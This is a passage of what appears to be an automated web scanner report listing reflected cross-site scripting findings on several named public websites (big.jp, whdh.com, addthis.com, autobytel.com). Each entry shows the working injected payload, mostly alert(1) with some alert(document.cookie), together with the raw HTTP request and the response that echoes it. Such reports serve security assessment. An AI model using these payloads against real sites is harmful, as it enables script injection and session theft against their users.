Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 12009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - </title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/holiday_helping/BO144733e840b\"><a>5b88da6bb42/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1878. http://www25.big.jp/styles.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cb0a<script>alert(1)</script>b9f156601de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles.css8cb0a<script>alert(1)</script>b9f156601de HTTP/1.1
Host: www25.big.jp
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:28:33 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2654
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/styles.css8cb0a<script>alert(1)</script>b9f156601de</Title>
<Meta Http-equiv="content-
...[SNIP]...
<Font Class="topics">http://www25.big.jp/styles.css8cb0a<script>alert(1)</script>b9f156601de</FONT>
...[SNIP]...

4.1879. http://www25.big.jp/styles.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload c2b33</title><script>alert(1)</script>909c52e451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles.cssc2b33</title><script>alert(1)</script>909c52e451 HTTP/1.1
Host: www25.big.jp
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:28:37 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2668
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/styles.cssc2b33</title><script>alert(1)</script>909c52e451</Title>
<Meta Http-equiv="c
...[SNIP]...

4.1880. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe517<script>alert(1)</script>c6ee4a3cfa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jamfe517<script>alert(1)</script>c6ee4a3cfa8/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2664
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jamfe517<script>alert(1)</script>c6ee4a3cfa8/leafnode+/</Title>
<Meta Http-equiv="con
...[SNIP]...
<Font Class="topics">http://www25.big.jp/~jamfe517<script>alert(1)</script>c6ee4a3cfa8/leafnode+/</FONT>
...[SNIP]...

4.1881. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 4d9b2</title><script>alert(1)</script>c5f823129ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam4d9b2</title><script>alert(1)</script>c5f823129ca/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:18 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2680
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam4d9b2</title><script>alert(1)</script>c5f823129ca/leafnode+/</Title>
<Meta Http-eq
...[SNIP]...

4.1882. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 6a9c1</title><script>alert(1)</script>657fbadbcca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+6a9c1</title><script>alert(1)</script>657fbadbcca/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:22 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2680
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+6a9c1</title><script>alert(1)</script>657fbadbcca/</Title>
<Meta Http-eq
...[SNIP]...

4.1883. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7ad79<script>alert(1)</script>a8eb4739661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+7ad79<script>alert(1)</script>a8eb4739661/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:20 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2664
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+7ad79<script>alert(1)</script>a8eb4739661/</Title>
<Meta Http-equiv="con
...[SNIP]...
<Font Class="topics">http://www25.big.jp/~jam/leafnode+7ad79<script>alert(1)</script>a8eb4739661/</FONT>
...[SNIP]...

4.1884. http://www25.big.jp/~jam/leafnode+/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 886be</title><script>alert(1)</script>e48585103f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+/?886be</title><script>alert(1)</script>e48585103f0=1 HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:08 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2686
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+/?886be</title><script>alert(1)</script>e48585103f0=1</Title>
<Meta Http
...[SNIP]...

4.1885. http://www25.big.jp/~jam/leafnode+/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www25.big.jp
Path:	/~jam/leafnode+/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 68775<script>alert(1)</script>9e9dc9952f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+/?68775<script>alert(1)</script>9e9dc9952f3=1 HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:06 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2670
Connection: close
Content-Type: text/html; charset=UTF-8

<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+/?68775<script>alert(1)</script>9e9dc9952f3=1</Title>
<Meta Http-equiv="
...[SNIP]...
<Font Class="topics">http://www25.big.jp/~jam/leafnode+/?68775<script>alert(1)</script>9e9dc9952f3=1</FONT>
...[SNIP]...

4.1886. http://www3.whdh.com/mobile/phoneforecast/settings.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www3.whdh.com
Path:	/mobile/phoneforecast/settings.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bebc"><script>alert(1)</script>b51006e4a2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bebc\"><script>alert(1)</script>b51006e4a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/phoneforecast/settings.php/5bebc"><script>alert(1)</script>b51006e4a2e HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=7a8ccd97e16fa89d1e1ade44f062356c; expires=Thu, 26-Jan-2012 00:10:29 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=997d49194ce1394ab37bc9f94e006b91; path=/
Expires: Wed, 26 Jan 2011 00:10:29 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...
<form id="myform" name="myform" action="/mobile/phoneforecast/settings.php/5bebc\"><script>alert(1)</script>b51006e4a2e" method="post">
...[SNIP]...

4.1887. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efaa"><script>alert(1)</script>9136b0f006 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8efaa"><script>alert(1)</script>9136b0f006

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=8efaa"><script>alert(1)</script>9136b0f006" />
...[SNIP]...

4.1888. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e1557<script>alert(1)</script>1877a8f3a1f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>e1557<script>alert(1)</script>1877a8f3a1f - Google search</h4>
...[SNIP]...

4.1889. http://www.autobytel.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 43b1a--><img%20src%3da%20onerror%3dalert(1)>19c294b5521 was submitted in the Referer HTTP header. This input was echoed as 43b1a--><img src=a onerror=alert(1)>19c294b5521 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=43b1a--><img%20src%3da%20onerror%3dalert(1)>19c294b5521

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:06:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:06:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E43b1a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E19c294b5521;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71149

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>19c294b5521 -->
...[SNIP]...

4.1890. http://www.autobytel.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98463"%3balert(1)//4b2bfd1744b was submitted in the Referer HTTP header. This input was echoed as 98463";alert(1)//4b2bfd1744b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:06:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:06:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E98463%22%3Balert%281%29%2F%2F4b2bfd1744b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71104

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~98463";alert(1)//4b2bfd1744b";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48E84A1E-FBE0-BED8-F032B9F4
...[SNIP]...

4.1891. http://www.autobytel.com/a.cfml [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/a.cfml

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd812"%3balert(1)//9e2802c099f was submitted in the Referer HTTP header. This input was echoed as cd812";alert(1)//9e2802c099f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a.cfml HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=cd812"%3balert(1)//9e2802c099f

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23598
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:46:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:28 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ecd812%22%3Balert%281%29%2F%2F9e2802c099f;path=/
Set-Cookie: PV_CT=3;path=/




 <!-- Referer: http://www.google.com/search?hl=en&q=cd812"%3baler
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~cd812";alert(1)//9e2802c099f";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4834FFF0-C164-F7B0-ECFFDD80
...[SNIP]...

4.1892. http://www.autobytel.com/a.cfml [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/a.cfml

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 15764--><img%20src%3da%20onerror%3dalert(1)>d38ec732909 was submitted in the Referer HTTP header. This input was echoed as 15764--><img src=a onerror=alert(1)>d38ec732909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23661
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:46:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:36 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E15764%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ed38ec732909;path=/
Set-Cookie: PV_CT=3;path=/




 <img%
...[SNIP]...
<img src=a onerror=alert(1)>d38ec732909 -->
...[SNIP]...

4.1893. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/ask-our-mechanics/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 303f1--><img%20src%3da%20onerror%3dalert(1)>22eba66e9cd was submitted in the Referer HTTP header. This input was echoed as 303f1--><img src=a onerror=alert(1)>22eba66e9cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=303f1--><img%20src%3da%20onerror%3dalert(1)>22eba66e9cd

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:02 GMT
Content-Length: 22293
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E303f1%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E22eba66e9cd;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
